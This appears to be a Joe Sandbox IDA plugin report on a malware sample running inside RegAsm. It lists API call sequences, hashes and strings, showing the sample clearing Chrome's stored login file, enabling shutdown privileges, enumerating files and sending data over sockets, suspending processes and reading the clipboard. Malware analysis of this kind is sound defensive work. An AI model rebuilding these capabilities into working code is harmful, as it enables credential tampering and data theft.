                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                        • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                        • API String ID: 1589313981-2876530381
                                                                        • Opcode ID: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                                                                        • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                                        • Opcode Fuzzy Hash: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                                                                        • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                                        • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: ACP$OCP$['E
                                                                        • API String ID: 2299586839-2532616801
                                                                        • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                        • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                                        • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                        • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                                        APIs
                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                                        • GetLastError.KERNEL32 ref: 0040BA58
                                                                        Strings
                                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                                        • UserProfile, xrefs: 0040BA1E
                                                                        • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteErrorFileLast
                                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                        • API String ID: 2018770650-1062637481
                                                                        • Opcode ID: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                                                                        • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                                                        • Opcode Fuzzy Hash: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                                                                        • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                        • GetLastError.KERNEL32 ref: 0041799D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 3534403312-3733053543
                                                                        • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                        • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                                        • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                        • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 00409258
                                                                          • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00B64958,00000010), ref: 004048E0
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                                        • FindClose.KERNEL32(00000000), ref: 004093C1
                                                                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                          • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                          • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                        • FindClose.KERNEL32(00000000), ref: 004095B9
                                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                        • String ID:
                                                                        • API String ID: 1824512719-0
                                                                        • Opcode ID: 6cad6af0f329120c81c925ac196a2686bd147d6e8b43e11fbd3a5bfa6db4d0ce
                                                                        • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                                        • Opcode Fuzzy Hash: 6cad6af0f329120c81c925ac196a2686bd147d6e8b43e11fbd3a5bfa6db4d0ce
                                                                        • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                                        • String ID:
                                                                        • API String ID: 276877138-0
                                                                        • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                                        • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                                        • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                                        • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                                        APIs
                                                                        • FindResourceA.KERNEL32 ref: 0041B4B9
                                                                        • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                                        • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                                        • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID: SETTINGS
                                                                        • API String ID: 3473537107-594951305
                                                                        • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                        • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                                        • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                        • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
APIs
• __EH_prolog.LIBCMT ref: 0040966A
• FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
• FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
• Opcode ID: 00f782369a89d33849f7f6744ff3d95afce15a7ce25431a6756746a16509b34f
• Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
• Opcode Fuzzy Hash: 00f782369a89d33849f7f6744ff3d95afce15a7ce25431a6756746a16509b34f
• Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
APIs
• __EH_prolog.LIBCMT ref: 00408811
• FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
• __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseException@8FirstH_prologNextThrow
• String ID:
• API String ID: 1771804793-0
• Opcode ID: 0f06b2c920d3f56931589272aebff858d631c73faf5deba1a71424e6e633b9f6
• Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
• Opcode Fuzzy Hash: 0f06b2c920d3f56931589272aebff858d631c73faf5deba1a71424e6e633b9f6
• Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FileFind$FirstNextsend
• String ID: XPG$XPG
• API String ID: 4113138495-1962359302
• Opcode ID: f5f6ad7c1e663cc93207a7cd22a0ce1f29ec8503eb9be1c9e7cd2c1c921ea284
• Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
• Opcode Fuzzy Hash: f5f6ad7c1e663cc93207a7cd22a0ce1f29ec8503eb9be1c9e7cd2c1c921ea284
• Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
APIs
  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
• String ID: sJD
• API String ID: 1661935332-3536923933
• Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
• Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
• Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
• Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
APIs
  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
• Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
• Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
• Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
• Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
APIs
• IsDebuggerPresent.KERNEL32 ref: 0043BC1A
• SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
• Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
• Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
• Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
• UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
Memory Dump Source
• Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
• Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
• Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
• Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
APIs
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseDataOpen
• String ID:
• API String ID: 2058664381-0
• Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
• Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
• Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
• Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
• NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
• CloseHandle.KERNEL32(00000000), ref: 0041BB2A
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$CloseHandleOpenSuspend
• String ID:
• API String ID: 1999457699-0
• Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
• Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
• Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
• Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
• NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
• CloseHandle.KERNEL32(00000000), ref: 0041BB56
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$CloseHandleOpenResume
• String ID:
• API String ID: 3614150671-0
• Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
• Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
• Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
• Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FeaturePresentProcessor
• String ID: MZ@
• API String ID: 2325560087-2978689999
• Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
• Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
• Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
• Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
• Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
• Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
• Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
Strings
Memory Dump Source
• Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
• Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
• Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
• Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                        • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                        • String ID: lJD
